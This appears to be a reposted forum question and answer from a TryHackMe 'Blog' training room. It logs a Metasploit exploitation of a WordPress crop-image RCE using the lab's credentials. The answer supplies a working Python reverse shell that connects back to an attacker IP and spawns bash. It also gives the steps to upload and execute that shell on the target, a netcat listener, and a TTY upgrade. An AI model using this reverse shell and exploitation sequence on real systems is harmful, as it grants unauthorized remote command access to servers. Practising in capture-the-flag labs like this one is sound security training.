• caglararli@hotmail.com
  • 05386281520

The "Shell" command does not work in Meterpreter [closed]

Çağlar Arlı      -    32 Views

The "Shell" command does not work in Meterpreter [closed]

I would like to share the solution I have used in this issue

Scenario:

meterpreter > ?
Stdapi: System Commands
=======================

    Command                   Description
    -------                   -----------
    shell                     Drop into a system command shell

// In this case, I would like to use the shell command.

meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments

// But after inputting the shell command, it returns an error.

You are required to create a reverse_shell.py to access the shell. Here are the steps:
  1. Create reverse_shell.py. Remember to replace the information (IP, Port)

    reverse_shell.py

    import socket, subprocess, os s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("<YOUR_IP>", <YOUR_PORT>)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p = subprocess.call(["/bin/bash", "-i"])

  2. Upload the Script to the Target

    meterpreter > upload /home/kali/Downloads/reverse_shell.py /tmp/reverse_shell.py [] Uploading : /home/kali/Downloads/reverse_shell.py -> /tmp/reverse_shell.py [] Uploaded -1.00 B of 243.00 B (-0.41%): /home/kali/Downloads/reverse_shell.py -> /tmp/reverse_shell.py [*] Completed : /home/kali/Downloads/reverse_shell.py -> /tmp/reverse_shell.py

  3. Set Up a NetCat Listener on Your Local Machine (Another Terminal)

    nc -lvnp <YOUR_PORT> -t

  4. Execute it!

    meterpreter > execute -f /usr/bin/python3 -a /tmp/reverse_shell.py Process 1576 created.

  5. You should see the shell command output from the Netcat reverse shell (another terminal)

    ┌──(kali㉿kali)-[~] └─$ nc -lvnp 1560 -t listening on [any] 1560 ... connect to [10.4.109.11] from (UNKNOWN) [10.10.189.47] 60642 bash: cannot set terminal process group (925): Inappropriate ioctl for device bash: no job control in this shell www-data@blog:/var/www/wordpress$ python3 -c 'import pty; pty.spawn("/bin/bash")' <ss$ python3 -c 'import pty; pty.spawn("/bin/bash")' www-data@blog:/var/www/wordpress$

Additional: You are required to run this command in the reverse shell only if you are attempting to log in to MySQL.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Please correct me if there are any mistakes. I am new to this, and I hope it will help others. Good luck!


Question: I am learning to use the Metasploit to exploit a WordPress website provided by TryHackMe.com https://tryhackme.com/r/room/blog

I am having difficulties with my meterpreter. It always returns an error when I enter a shell command.

meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments

I have no idea why mine returns an error while the guidance from YouTube does not, as I follow the exact instructions. https://www.youtube.com/watch?v=zmK_hg6hIM0&t=166s

Any comments are welcome and much appreciated. Thanks guys.

Here are the complete commands.

msf6 > search wordpress date:2019

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/multi/http/wp_db_backup_rce            2019-04-24       excellent  Yes    WP Database Backup RCE
   1    \_ target: Windows                           .                .          .      .
   2    \_ target: Linux                             .                .          .      .
   3  exploit/multi/http/wp_crop_rce                 2019-02-19       excellent  Yes    WordPress Crop-image Shell Upload
   4  auxiliary/scanner/http/wp_email_sub_news_sqli  2019-11-13       normal     No     WordPress Email Subscribers and Newsletter Hash SQLi Scanner
   5  auxiliary/admin/http/wp_google_maps_sqli       2019-04-02       normal     Yes    WordPress Google Maps Plugin SQL Injection


Interact with a module by name or index. For example info 5, use 5 or use auxiliary/admin/http/wp_google_maps_sqli                                                                                                                

msf6 > use exploit/multi/http/wp_crop_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_crop_rce) > show options

Module options (exploit/multi/http/wp_crop_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       The WordPress password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metaspl
                                         oit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THEME_DIR                   no        The WordPress theme dir name (disable theme auto-detection if provided
                                         )
   USERNAME                    yes       The WordPress username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   WordPress



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/wp_crop_rce) > set RHOSTS blog.thm
RHOSTS => blog.thm
msf6 exploit(multi/http/wp_crop_rce) > set LHOST 10.4.109.11
LHOST => 10.4.109.11
msf6 exploit(multi/http/wp_crop_rce) > set LPORT 1560
LPORT => 1560
msf6 exploit(multi/http/wp_crop_rce) > set USERNAME kwheel
USERNAME => kwheel
msf6 exploit(multi/http/wp_crop_rce) > set PASSWORD cutiepie1
PASSWORD => cutiepie1
msf6 exploit(multi/http/wp_crop_rce) > run

[*] Started reverse TCP handler on 10.4.109.11:1560 
[*] Authenticating with WordPress using kwheel:cutiepie1...
[+] Authenticated with WordPress
[*] Preparing payload...
[*] Uploading payload
[+] Image uploaded
[*] Including into theme
[*] Sending stage (40004 bytes) to 10.10.189.47
[*] Meterpreter session 1 opened (10.4.109.11:1560 -> 10.10.189.47:60582) at 2024-11-01 15:40:30 -0400
[*] Attempting to clean up files...

meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments
meterpreter > shell
[-] Error running command shell: Rex::ArgumentError An invalid argument was specified. Unknown type for arguments
meterpreter > ls
Listing: /var/www/wordpress
===========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100640/rw-r-----  235    fil   2020-05-28 08:15:42 -0400  .htaccess
100640/rw-r-----  235    fil   2020-05-27 23:44:26 -0400  .htaccess_backup
100640/rw-r-----  418    fil   2013-09-24 20:18:11 -0400  index.php
100640/rw-r-----  19935  fil   2020-05-26 11:39:37 -0400  license.txt
100644/rw-r--r--  1112   fil   2024-11-01 15:40:25 -0400  ofVQZvznEI.php
100640/rw-r-----  7415   fil   2020-05-26 11:39:37 -0400  readme.html
100640/rw-r-----  5458   fil   2020-05-26 11:39:37 -0400  wp-activate.php
040750/rwxr-x---  4096   dir   2018-12-06 13:00:07 -0500  wp-admin
100640/rw-r-----  364    fil   2015-12-19 06:20:28 -0500  wp-blog-header.php
100640/rw-r-----  1889   fil   2018-05-02 18:11:25 -0400  wp-comments-post.php
100640/rw-r-----  2853   fil   2015-12-16 04:58:26 -0500  wp-config-sample.php
100640/rw-r-----  3279   fil   2020-05-27 23:49:17 -0400  wp-config.php
040750/rwxr-x---  4096   dir   2020-05-25 23:52:32 -0400  wp-content
100640/rw-r-----  3669   fil   2017-08-20 00:37:45 -0400  wp-cron.php
040750/rwxr-x---  12288  dir   2018-12-06 13:00:08 -0500  wp-includes
100640/rw-r-----  2422   fil   2016-11-20 21:46:30 -0500  wp-links-opml.php
100640/rw-r-----  3306   fil   2017-08-22 07:52:48 -0400  wp-load.php
100640/rw-r-----  37286  fil   2020-05-26 11:39:37 -0400  wp-login.php
100640/rw-r-----  8048   fil   2017-01-11 00:13:43 -0500  wp-mail.php
100640/rw-r-----  17421  fil   2018-10-23 03:04:39 -0400  wp-settings.php
100640/rw-r-----  30091  fil   2018-04-29 19:10:26 -0400  wp-signup.php
100640/rw-r-----  4620   fil   2017-10-23 18:12:51 -0400  wp-trackback.php
100640/rw-r-----  3065   fil   2016-08-31 12:31:29 -0400  xmlrpc.php

meterpreter >